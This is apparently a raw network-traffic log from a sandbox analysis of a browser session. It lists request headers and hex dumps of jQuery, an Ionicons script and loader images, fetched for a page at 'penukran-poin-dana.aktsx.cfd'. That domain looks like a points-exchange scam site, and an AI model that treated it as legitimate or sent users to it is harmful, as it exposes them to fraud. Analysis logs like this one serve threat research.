                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                            Accept: */*
                                                                                                                            Sec-Fetch-Site: none
                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            2024-10-06 11:50:10 UTC612INHTTP/1.1 200 OK
                                                                                                                            Connection: close
                                                                                                                            Content-Length: 89476
                                                                                                                            Server: nginx
                                                                                                                            Content-Type: application/javascript; charset=utf-8
                                                                                                                            Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                                                                                            ETag: "28feccc0-15d84"
                                                                                                                            Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                            Cross-Origin-Resource-Policy: cross-origin
                                                                                                                            Via: 1.1 varnish, 1.1 varnish
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            Date: Sun, 06 Oct 2024 11:50:10 GMT
                                                                                                                            Age: 3372015
                                                                                                                            X-Served-By: cache-lga21981-LGA, cache-ewr-kewr1740068-EWR
                                                                                                                            X-Cache: HIT, HIT
                                                                                                                            X-Cache-Hits: 264, 1
                                                                                                                            X-Timer: S1728215410.014404,VS0,VE1
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            2024-10-06 11:50:10 UTC16384INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 35 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20
                                                                                                                            Data Ascii: /*! jQuery v3.5.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery
                                                                                                                            2024-10-06 11:50:10 UTC16384INData Raw: 61 3d 65 29 5b 53 5d 7c 7c 28 61 5b 53 5d 3d 7b 7d 29 29 5b 61 2e 75 6e 69 71 75 65 49 44 5d 7c 7c 28 6f 5b 61 2e 75 6e 69 71 75 65 49 44 5d 3d 7b 7d 29 29 5b 68 5d 7c 7c 5b 5d 29 5b 30 5d 3d 3d 3d 6b 26 26 72 5b 31 5d 29 2c 21 31 3d 3d 3d 64 29 77 68 69 6c 65 28 61 3d 2b 2b 73 26 26 61 26 26 61 5b 6c 5d 7c 7c 28 64 3d 73 3d 30 29 7c 7c 75 2e 70 6f 70 28 29 29 69 66 28 28 78 3f 61 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3d 3d 3d 66 3a 31 3d 3d 3d 61 2e 6e 6f 64 65 54 79 70 65 29 26 26 2b 2b 64 26 26 28 70 26 26 28 28 69 3d 28 6f 3d 61 5b 53 5d 7c 7c 28 61 5b 53 5d 3d 7b 7d 29 29 5b 61 2e 75 6e 69 71 75 65 49 44 5d 7c 7c 28 6f 5b 61 2e 75 6e 69 71 75 65 49 44 5d 3d 7b 7d 29 29 5b 68 5d 3d 5b 6b 2c 64 5d 29 2c 61 3d 3d 3d 65 29
                                                                                                                            Data Ascii: a=e)[S]||(a[S]={}))[a.uniqueID]||(o[a.uniqueID]={}))[h]||[])[0]===k&&r[1]),!1===d)while(a=++s&&a&&a[l]||(d=s=0)||u.pop())if((x?a.nodeName.toLowerCase()===f:1===a.nodeType)&&++d&&(p&&((i=(o=a[S]||(a[S]={}))[a.uniqueID]||(o[a.uniqueID]={}))[h]=[k,d]),a===e)
                                                                                                                            2024-10-06 11:50:10 UTC16384INData Raw: 7b 72 65 74 75 72 6e 20 31 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 7c 7c 39 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 7c 7c 21 2b 65 2e 6e 6f 64 65 54 79 70 65 7d 3b 66 75 6e 63 74 69 6f 6e 20 47 28 29 7b 74 68 69 73 2e 65 78 70 61 6e 64 6f 3d 53 2e 65 78 70 61 6e 64 6f 2b 47 2e 75 69 64 2b 2b 7d 47 2e 75 69 64 3d 31 2c 47 2e 70 72 6f 74 6f 74 79 70 65 3d 7b 63 61 63 68 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3b 72 65 74 75 72 6e 20 74 7c 7c 28 74 3d 7b 7d 2c 56 28 65 29 26 26 28 65 2e 6e 6f 64 65 54 79 70 65 3f 65 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3d 74 3a 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 74 68 69 73 2e 65 78 70 61 6e 64 6f 2c 7b 76 61 6c 75 65 3a
                                                                                                                            Data Ascii: {return 1===e.nodeType||9===e.nodeType||!+e.nodeType};function G(){this.expando=S.expando+G.uid++}G.uid=1,G.prototype={cache:function(e){var t=e[this.expando];return t||(t={},V(e)&&(e.nodeType?e[this.expando]=t:Object.defineProperty(e,this.expando,{value:
                                                                                                                            2024-10-06 11:50:10 UTC16384INData Raw: 28 73 2e 74 79 70 65 29 3f 75 2e 63 68 65 63 6b 65 64 3d 73 2e 63 68 65 63 6b 65 64 3a 22 69 6e 70 75 74 22 21 3d 3d 6c 26 26 22 74 65 78 74 61 72 65 61 22 21 3d 3d 6c 7c 7c 28 75 2e 64 65 66 61 75 6c 74 56 61 6c 75 65 3d 73 2e 64 65 66 61 75 6c 74 56 61 6c 75 65 29 3b 69 66 28 74 29 69 66 28 6e 29 66 6f 72 28 6f 3d 6f 7c 7c 76 65 28 65 29 2c 61 3d 61 7c 7c 76 65 28 63 29 2c 72 3d 30 2c 69 3d 6f 2e 6c 65 6e 67 74 68 3b 72 3c 69 3b 72 2b 2b 29 4f 65 28 6f 5b 72 5d 2c 61 5b 72 5d 29 3b 65 6c 73 65 20 4f 65 28 65 2c 63 29 3b 72 65 74 75 72 6e 20 30 3c 28 61 3d 76 65 28 63 2c 22 73 63 72 69 70 74 22 29 29 2e 6c 65 6e 67 74 68 26 26 79 65 28 61 2c 21 66 26 26 76 65 28 65 2c 22 73 63 72 69 70 74 22 29 29 2c 63 7d 2c 63 6c 65 61 6e 44 61 74 61 3a 66 75 6e 63 74
                                                                                                                            Data Ascii: (s.type)?u.checked=s.checked:"input"!==l&&"textarea"!==l||(u.defaultValue=s.defaultValue);if(t)if(n)for(o=o||ve(e),a=a||ve(c),r=0,i=o.length;r<i;r++)Oe(o[r],a[r]);else Oe(e,c);return 0<(a=ve(c,"script")).length&&ye(a,!f&&ve(e,"script")),c},cleanData:funct
                                                                                                                            2024-10-06 11:50:10 UTC16384INData Raw: 6e 64 28 7b 61 74 74 72 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 2c 69 2c 6f 3d 65 2e 6e 6f 64 65 54 79 70 65 3b 69 66 28 33 21 3d 3d 6f 26 26 38 21 3d 3d 6f 26 26 32 21 3d 3d 6f 29 72 65 74 75 72 6e 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 3f 53 2e 70 72 6f 70 28 65 2c 74 2c 6e 29 3a 28 31 3d 3d 3d 6f 26 26 53 2e 69 73 58 4d 4c 44 6f 63 28 65 29 7c 7c 28 69 3d 53 2e 61 74 74 72 48 6f 6f 6b 73 5b 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5d 7c 7c 28 53 2e 65 78 70 72 2e 6d 61 74 63 68 2e 62 6f 6f 6c 2e 74 65 73 74 28 74 29 3f 70 74 3a 76 6f 69 64 20 30 29 29 2c 76 6f 69 64 20 30 21 3d 3d 6e 3f 6e 75 6c 6c 3d 3d 3d 6e 3f 76 6f 69 64 20 53 2e 72 65 6d 6f 76 65 41 74 74
                                                                                                                            Data Ascii: nd({attr:function(e,t,n){var r,i,o=e.nodeType;if(3!==o&&8!==o&&2!==o)return"undefined"==typeof e.getAttribute?S.prop(e,t,n):(1===o&&S.isXMLDoc(e)||(i=S.attrHooks[t.toLowerCase()]||(S.expr.match.bool.test(t)?pt:void 0)),void 0!==n?null===n?void S.removeAtt
                                                                                                                            2024-10-06 11:50:10 UTC7556INData Raw: 20 69 2e 78 68 72 46 69 65 6c 64 73 29 72 5b 6e 5d 3d 69 2e 78 68 72 46 69 65 6c 64 73 5b 6e 5d 3b 66 6f 72 28 6e 20 69 6e 20 69 2e 6d 69 6d 65 54 79 70 65 26 26 72 2e 6f 76 65 72 72 69 64 65 4d 69 6d 65 54 79 70 65 26 26 72 2e 6f 76 65 72 72 69 64 65 4d 69 6d 65 54 79 70 65 28 69 2e 6d 69 6d 65 54 79 70 65 29 2c 69 2e 63 72 6f 73 73 44 6f 6d 61 69 6e 7c 7c 65 5b 22 58 2d 52 65 71 75 65 73 74 65 64 2d 57 69 74 68 22 5d 7c 7c 28 65 5b 22 58 2d 52 65 71 75 65 73 74 65 64 2d 57 69 74 68 22 5d 3d 22 58 4d 4c 48 74 74 70 52 65 71 75 65 73 74 22 29 2c 65 29 72 2e 73 65 74 52 65 71 75 65 73 74 48 65 61 64 65 72 28 6e 2c 65 5b 6e 5d 29 3b 6f 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 6f 26 26 28 6f 3d 61 3d 72 2e
                                                                                                                            Data Ascii: i.xhrFields)r[n]=i.xhrFields[n];for(n in i.mimeType&&r.overrideMimeType&&r.overrideMimeType(i.mimeType),i.crossDomain||e["X-Requested-With"]||(e["X-Requested-With"]="XMLHttpRequest"),e)r.setRequestHeader(n,e[n]);o=function(e){return function(){o&&(o=a=r.


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            37192.168.2.649778104.17.249.2034436220C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-10-06 11:50:09 UTC634OUTGET /ionicons@7.1.0/dist/ionicons/p-40ae2aa7.js HTTP/1.1
                                                                                                                            Host: unpkg.com
                                                                                                                            Connection: keep-alive
                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                            Origin: http://penukran-poin-dana.aktsx.cfd
                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                            Accept: */*
                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                            Referer: https://unpkg.com/ionicons@7.1.0/dist/ionicons/p-1c0b2c47.entry.js
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            2024-10-06 11:50:10 UTC576INHTTP/1.1 200 OK
                                                                                                                            Date: Sun, 06 Oct 2024 11:50:10 GMT
                                                                                                                            Content-Type: application/javascript; charset=utf-8
                                                                                                                            Transfer-Encoding: chunked
                                                                                                                            Connection: close
                                                                                                                            access-control-allow-origin: *
                                                                                                                            cache-control: public, max-age=31536000
                                                                                                                            last-modified: Sat, 26 Oct 1985 08:15:00 GMT
                                                                                                                            etag: W/"446-Txl4AaMXTHFEqGcTKKB8nQp2w2M"
                                                                                                                            via: 1.1 fly.io
                                                                                                                            fly-request-id: 01HRW74HR1056C4E8M8PP3EXF1-lga
                                                                                                                            CF-Cache-Status: HIT
                                                                                                                            Age: 17871406
                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                            Server: cloudflare
                                                                                                                            CF-RAY: 8ce56ea8d9ad4258-EWR
                                                                                                                            2024-10-06 11:50:10 UTC793INData Raw: 34 34 36 0d 0a 69 6d 70 6f 72 74 7b 67 20 61 73 20 6e 7d 66 72 6f 6d 22 2e 2f 70 2d 64 31 35 65 63 33 30 37 2e 6a 73 22 3b 6c 65 74 20 74 3b 63 6f 6e 73 74 20 65 3d 28 29 3d 3e 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 29 72 65 74 75 72 6e 20 6e 65 77 20 4d 61 70 3b 69 66 28 21 74 29 7b 63 6f 6e 73 74 20 6e 3d 77 69 6e 64 6f 77 3b 6e 2e 49 6f 6e 69 63 6f 6e 73 3d 6e 2e 49 6f 6e 69 63 6f 6e 73 7c 7c 7b 7d 2c 74 3d 6e 2e 49 6f 6e 69 63 6f 6e 73 2e 6d 61 70 3d 6e 2e 49 6f 6e 69 63 6f 6e 73 2e 6d 61 70 7c 7c 6e 65 77 20 4d 61 70 7d 72 65 74 75 72 6e 20 74 7d 2c 72 3d 6e 3d 3e 7b 63 6f 6e 73 74 20 74 3d 65 28 29 3b 4f 62 6a 65 63 74 2e 6b 65 79 73 28 6e 29 2e 66 6f 72 45 61 63 68 28 28 65 3d 3e 74 2e 73 65 74 28
                                                                                                                            Data Ascii: 446import{g as n}from"./p-d15ec307.js";let t;const e=()=>{if("undefined"==typeof window)return new Map;if(!t){const n=window;n.Ionicons=n.Ionicons||{},t=n.Ionicons.map=n.Ionicons.map||new Map}return t},r=n=>{const t=e();Object.keys(n).forEach((e=>t.set(
                                                                                                                            2024-10-06 11:50:10 UTC308INData Raw: 6f 6e 73 74 20 65 3d 7b 7d 3b 72 65 74 75 72 6e 20 74 2e 66 6f 72 45 61 63 68 28 28 74 3d 3e 7b 6e 2e 68 61 73 41 74 74 72 69 62 75 74 65 28 74 29 26 26 28 6e 75 6c 6c 21 3d 3d 6e 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 74 29 26 26 28 65 5b 74 5d 3d 6e 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 74 29 29 2c 6e 2e 72 65 6d 6f 76 65 41 74 74 72 69 62 75 74 65 28 74 29 29 7d 29 29 2c 65 7d 2c 63 3d 6e 3d 3e 6e 26 26 22 22 21 3d 3d 6e 2e 64 69 72 3f 22 72 74 6c 22 3d 3d 3d 6e 2e 64 69 72 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3a 22 72 74 6c 22 3d 3d 3d 28 6e 75 6c 6c 3d 3d 3d 64 6f 63 75 6d 65 6e 74 7c 7c 76 6f 69 64 20 30 3d 3d 3d 64 6f 63 75 6d 65 6e 74 3f 76 6f 69 64 20 30 3a 64 6f 63 75 6d 65 6e 74 2e 64 69 72 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29
                                                                                                                            Data Ascii: onst e={};return t.forEach((t=>{n.hasAttribute(t)&&(null!==n.getAttribute(t)&&(e[t]=n.getAttribute(t)),n.removeAttribute(t))})),e},c=n=>n&&""!==n.dir?"rtl"===n.dir.toLowerCase():"rtl"===(null===document||void 0===document?void 0:document.dir.toLowerCase()
                                                                                                                            2024-10-06 11:50:10 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                            Data Ascii: 0


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            38192.168.2.649773142.250.185.1934436220C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-10-06 11:50:10 UTC655OUTGET /img/b/R29vZ2xl/AVvXsEi8hbZEfutKvr9pkj0-mkJYWt-1SBtt3gw-HFOEZc0172okrp0SFHLaW3PRGVDm1U0P7WWEMELIw4nlq1_1gCgyZBo3cxf-OJNpguNamdJryCkGU-hTHiW3RyOv5JD9eIjXTFtrJFCVn0ae4RxG4Oi-czAP20tEaJI3OstxFAbtOwtFxp6RvOHc6NZL/s1600/load_bg.png HTTP/1.1
                                                                                                                            Host: blogger.googleusercontent.com
                                                                                                                            Connection: keep-alive
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                            Accept: */*
                                                                                                                            X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIlKHLAQj6mM0BCIWgzQEIucrNARjrjaUX
                                                                                                                            Sec-Fetch-Site: none
                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            2024-10-06 11:50:10 UTC466INHTTP/1.1 200 OK
                                                                                                                            Content-Type: image/png
                                                                                                                            Vary: Origin
                                                                                                                            Access-Control-Expose-Headers: Content-Length
                                                                                                                            ETag: "v60c"
                                                                                                                            Expires: Mon, 07 Oct 2024 11:50:10 GMT
                                                                                                                            Cache-Control: public, max-age=86400, no-transform
                                                                                                                            Content-Disposition: inline;filename="load_bg.png"
                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                            Date: Sun, 06 Oct 2024 11:50:10 GMT
                                                                                                                            Server: fife
                                                                                                                            Content-Length: 7768
                                                                                                                            X-XSS-Protection: 0
                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                            Connection: close
                                                                                                                            2024-10-06 11:50:10 UTC924INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 2c 00 00 01 2c 08 04 00 00 00 d3 74 46 fe 00 00 00 02 73 42 49 54 08 08 55 ec 46 04 00 00 00 02 62 4b 47 44 00 00 aa 8d 23 32 00 00 00 5f 7a 54 58 74 52 61 77 20 70 72 6f 66 69 6c 65 20 74 79 70 65 20 41 50 50 31 00 00 08 99 e3 4a 4f cd 4b 2d ca 4c 56 28 28 ca 4f cb cc 49 e5 52 00 03 63 13 2e 13 4b 13 4b a3 44 03 03 03 0b 03 08 30 34 30 30 36 04 92 46 40 b6 39 54 28 d1 00 05 98 98 9b a5 01 a1 b9 59 b2 99 29 88 cf 05 00 4f ba 15 68 1b 2d d8 8c 00 00 1d 98 49 44 41 54 78 9c ed 9d d9 6f 5b 57 9e a0 bf df bd dc 24 52 bb 44 49 d6 ee 25 b1 9d 38 76 9c bd aa 92 54 d6 0a a6 6a aa d1 1d f4 4b d7 43 a3 1f e6 71 96 a7 01 06 03 cc fc 05 fd 32 4f 83 6e 60 80 69 34 aa a7 bb 06 18 54 01 d3 5d 93 a4 12 77 57 3a a9
                                                                                                                            Data Ascii: PNGIHDR,,tFsBITUFbKGD#2_zTXtRaw profile type APP1JOK-LV((OIRc.KKD04006F@9T(Y)Oh-IDATxo[W$RDI%8vTjKCq2On`i4T]wW:
                                                                                                                            2024-10-06 11:50:10 UTC1390INData Raw: df ba 2d e2 72 97 58 42 2f 2f 73 0a bf 96 aa 00 84 14 23 7c c6 84 9b 8e 9a 59 e9 02 ec 22 c2 0b bc 49 2f 46 a5 0b e2 39 0c 3a 18 c2 cf 92 7b b2 f3 6e 11 cb e4 14 6f 72 89 3a 37 fd ea 3c 84 22 44 3f dd 6c b1 ea 8e 23 e8 0e b1 5a f8 01 af d2 e9 b2 86 d9 6b 08 2d 0c 11 61 99 ad 4a 17 c5 0d 62 99 3c c1 db 9c 23 e0 8e 5f 9a c7 09 d0 c3 09 b6 58 a9 f4 d1 ac b4 58 61 5e e6 75 da 2b 5c 8a ea a2 89 41 02 cc 93 aa 64 21 2a 29 96 d0 c7 db 5c d4 99 75 c7 09 d0 4b 27 6b 95 1c 24 58 39 b1 82 3c cb db f4 e8 b8 aa 24 08 6d 0c a2 58 a8 54 a7 4f a5 c4 6a e2 35 5e 22 a2 eb aa 12 52 47 3f 61 e6 2b 33 12 a2 32 62 f5 f1 2e e7 f0 55 e4 bd 6b 09 93 2e ba 58 61 b5 12 6f 5d 6e 7c 3c cd bb 9c 28 fb fb d6 26 42 0b 03 c4 59 2c f7 4c cb 72 8b 55 cf 2b bc 4a a3 6e 02 cb 48 1d 03 f8 98
                                                                                                                            Data Ascii: -rXB//s#|Y"I/F9:{nor:7<"D?l#Zk-aJb<#_XXa^u+\Ad!*)\uK'k$X9<$mXTOj5^"RG?a+32b.Uk.Xao]n|<(&BY,LrU+JnH
                                                                                                                            2024-10-06 11:50:10 UTC1390INData Raw: a1 a7 d2 17 8f 20 8f 7e c0 bb 2f 03 6a fb 8f f5 e8 8f ca 3e ce 10 f1 ea 62 89 8a b6 bd 69 52 df 63 d7 84 b3 98 5a ac e2 10 7c 06 4a 61 88 a5 2c c0 c0 10 83 16 df b3 4d 4d 81 88 ef 44 a4 de 67 1a 82 a0 d8 4a 6f a5 37 52 bf 5f 98 88 2f a7 d2 2a 60 6c 66 d2 ca 27 19 04 13 8b b4 97 be 07 93 27 b9 bf db 9c c7 c5 0a d3 8d 68 b1 8a 23 64 84 cd 4d 2b 69 a1 7c d2 1d bc d0 38 18 e9 6d 78 b6 a7 bf a3 b9 c1 e7 f3 fb 03 01 d3 14 11 10 b0 32 96 95 ce c4 d6 13 89 b5 8d 91 b9 9b b3 0f 63 9f ce df dd 50 4a 24 60 c0 46 c6 43 5f 84 70 82 30 eb bb 6f d8 cd 59 fe 40 2f ae 56 2c a6 d4 19 f5 e6 f9 c8 c5 d6 b7 86 06 3a ba 3b 9a 9b 7c 3e c9 a3 8d b3 ac 64 62 7c 7a 64 e6 d7 f7 bf 5e bc bb be 9c 8e 17 b9 79 6e 99 49 f3 4b 6e ef 5c 7d fc 03 7f 9f 37 75 7d 55 18 82 64 b7 4f 56 60 18
                                                                                                                            Data Ascii: ~/j>biRcZ|Ja,MMDgJo7R_/*`lf''h#dM+i|8mx2cPJ$`FC_p0oY@/V,:;|>db|zd^ynIKn\}7u}UdOV`
                                                                                                                            2024-10-06 11:50:10 UTC1390INData Raw: a6 59 5f ef ce 33 bb 2a c7 47 2b 64 a7 7f f9 dc fe 43 70 fd 2f 55 93 45 ec ca ca 00 c2 b4 b8 bb 21 04 4f 84 ad 1a b0 13 0e 11 0f 89 a5 f1 08 16 ad 84 6d b1 fc 04 b5 58 1a c7 08 e2 b7 c5 32 dc 9e 6c d0 78 0a 41 6c b1 22 7a 45 77 af e0 e2 91 4d 3b 08 f5 b6 58 1d fa 94 cb 33 78 e1 9b 32 e8 04 03 a1 42 43 6d 35 55 8a d0 86 18 08 41 2d 96 c6 41 84 20 62 9f 15 6a bc 82 7b 27 7f ed c6 04 03 c3 1b b3 9f 75 a5 0a 9e 49 13 fb 30 0c 82 de d8 35 c7 23 87 54 03 e0 27 64 50 a7 27 d6 6b 1c 45 e1 a7 de c8 0e cc d2 78 03 4f 04 59 01 ea 0c 82 de 88 b1 34 e0 99 80 c0 4f c8 c0 ef 8d 0e 1d 1d bc 7b 06 85 81 df c0 f0 46 3f 81 07 8a a8 c9 62 60 d8 62 69 34 ce 62 18 18 ba 0b 5a e3 30 82 e8 1a 4b e3 3c 62 f7 15 7a 01 e5 8d 62 6a 00 10 0c 9f 37 9a 42 3b 74 f7 44 0e a7 a4 ec 9f 0b
                                                                                                                            Data Ascii: Y_3*G+dCp/UE!OmX2lxAl"zEwM;X3x2BCm5UA-A bj{'uI05#T'dP'kExOY4O{F?b`bi4bZ0K<bzbj7B;tD
                                                                                                                            2024-10-06 11:50:10 UTC1390INData Raw: 0b 29 f0 8b c2 c2 3e 3f 75 ed 41 aa 2c 06 5f f3 f7 3c 8a 0c 77 78 96 f7 bc b1 13 18 9c 08 fe b4 fb fd f3 cf 9f 6b 6a 14 87 93 a6 4a 25 12 73 8b b3 8b df 8c fd e2 fe b7 b1 99 24 ca 13 8d 90 1b c8 f0 21 5f 66 af ec 3e 68 1d fc 09 8d 5e f8 39 8a 04 c4 27 1d fe b7 3b 7f 72 fa e2 d0 89 ae 80 43 3d 6b eb eb f3 8b c3 d3 9f 0c ff 76 f6 e1 66 dc 52 ac a5 13 96 ae 9f f2 44 88 f1 f3 6c 16 eb 71 b1 42 fc 31 83 de 38 8e 82 88 89 22 6c 9e 8f fc a4 ef 95 c1 b3 03 6d cd c7 d5 4b 59 f1 c4 e2 d2 cc d2 fd 99 af a6 af cc 3e dc 5a 4c fb 48 29 85 21 82 a5 0c 71 75 4a d2 3d 08 0f f9 3b e2 3b 57 77 f3 03 de f0 86 58 60 8f 51 b4 bb 72 c3 e6 0f db 5e 8a 7e 7f f0 64 77 5b 4b 30 18 c8 6b f3 74 cb 4a 25 13 c9 95 b5 b9 a5 3b 33 b7 17 3e 9a 1e dd 9c 4b 66 bb f2 74 68 7e 0c 84 2b fc 76
                                                                                                                            Data Ascii: )>?uA,_<wxkjJ%s$!_f>h^9';rC=kvfRDlqB18"lmKY>ZLH)!quJ=;;WwX`Qr^~dw[K0ktJ%;3>Kfth~+v
                                                                                                                            2024-10-06 11:50:10 UTC1284INData Raw: 9e c5 3e 17 bc e9 d4 cb 39 d9 25 33 0f f4 e8 09 62 9e 44 48 f2 79 e1 c3 f9 72 e3 a4 58 8a 59 fc 74 e9 fe 43 cf 21 a4 f9 8a cf 0f 5b ac b6 50 9c 95 20 c3 34 21 dd 7f e8 39 2c ae f2 4f ce ae 82 e6 74 ed 92 66 9a 30 9d 5a 2d 0f a1 f8 96 2b 85 0f 3e 3e 1c e7 9b ad 14 53 44 88 6a b5 3c 82 e2 16 1f 17 d3 dd 7c 30 a5 88 87 92 4c d1 a8 73 f1 1e e1 0e 1f e5 da c1 ab 18 4a 13 68 27 99 a1 45 0f 5d 76 3d 8a 07 7c c4 4a 29 5e ba 54 67 70 71 a6 88 d0 a6 1b 44 17 a3 b8 c3 47 2c 95 e6 c5 4b 97 1a 88 33 a1 63 2d 17 a3 b8 e9 4c af e0 c1 94 32 e7 94 64 92 7a a2 7a 48 8d eb 10 2c be e5 e3 52 c4 56 59 4a 9b cc 4c 32 81 9f a8 4e 99 ba 0a 21 cd 55 ae 38 7f 26 b8 9b 52 7f e5 29 26 31 e9 d4 1d 3d ae 41 48 f2 25 bf 75 3a 6f b5 97 d2 d7 25 69 a6 48 d3 a5 bb a7 5d 81 b0 c5 e7 7c 5e
                                                                                                                            Data Ascii: >9%3bDHyrXYtC![P 4!9,Otf0Z-+>>SDj<|0LsJh'E]v=|J)^TgpqDG,K3c-L2dzzH,RVYJL2N!U8&R)&1=AH%u:o%iH]|^


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            39192.168.2.649774142.250.185.1934436220C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-10-06 11:50:10 UTC657OUTGET /img/b/R29vZ2xl/AVvXsEhl9xJVYWF_a9vAhgW5QQgozvZVADTaJgIX64iO7a5sQuMpSoPBK3zfKjvT6xc9fZPfxZz39mjk1H_oZOOOtYvO1l7DkWNqiD5LJyGYdwDNyHuyqLk_Ix6eFs3aLCG2yUXVwtsnj0BXTA40WZmecyLyCIm_ff0xNkkOvkuKBOl6yfS-QjI_EJrIyGtU/s1600/load_spin.png HTTP/1.1
                                                                                                                            Host: blogger.googleusercontent.com
                                                                                                                            Connection: keep-alive
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                            Accept: */*
                                                                                                                            X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIlKHLAQj6mM0BCIWgzQEIucrNARjrjaUX
                                                                                                                            Sec-Fetch-Site: none
                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            2024-10-06 11:50:10 UTC468INHTTP/1.1 200 OK
                                                                                                                            Content-Type: image/png
                                                                                                                            Vary: Origin
                                                                                                                            Access-Control-Expose-Headers: Content-Length
                                                                                                                            ETag: "v60d"
                                                                                                                            Expires: Mon, 07 Oct 2024 11:50:10 GMT
                                                                                                                            Cache-Control: public, max-age=86400, no-transform
                                                                                                                            Content-Disposition: inline;filename="load_spin.png"
                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                            Date: Sun, 06 Oct 2024 11:50:10 GMT
                                                                                                                            Server: fife
                                                                                                                            Content-Length: 4995
                                                                                                                            X-XSS-Protection: 0
